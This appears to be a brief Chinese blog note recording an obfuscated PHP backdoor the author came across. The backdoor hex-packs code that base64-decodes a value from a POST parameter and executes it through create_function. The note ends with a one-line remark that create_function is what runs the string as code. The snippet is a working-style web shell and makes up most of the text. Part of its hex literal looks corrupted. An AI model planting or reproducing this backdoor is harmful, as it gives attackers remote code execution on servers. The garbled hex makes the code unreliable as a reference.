从别处看到PHP注入的方式，尚不完全清楚，只做记录，有时间再来研究。

$Content=Create_Function("", PACK("H*", "72657475726e207472696d2862969e32686578286261736536345f6465636f64652840245f504f53545b22434e4d574146225d2929293b"));
$ContentS = $Content();
if ($ContentS) {
    $text = PACK("H*", $ContentS);
    $St = Create_Function("", $text);
    $St();
    exit();
}

看样子，主要是利用了create_function方法，传入特定的字符串后，将字符串当做程序直接运行。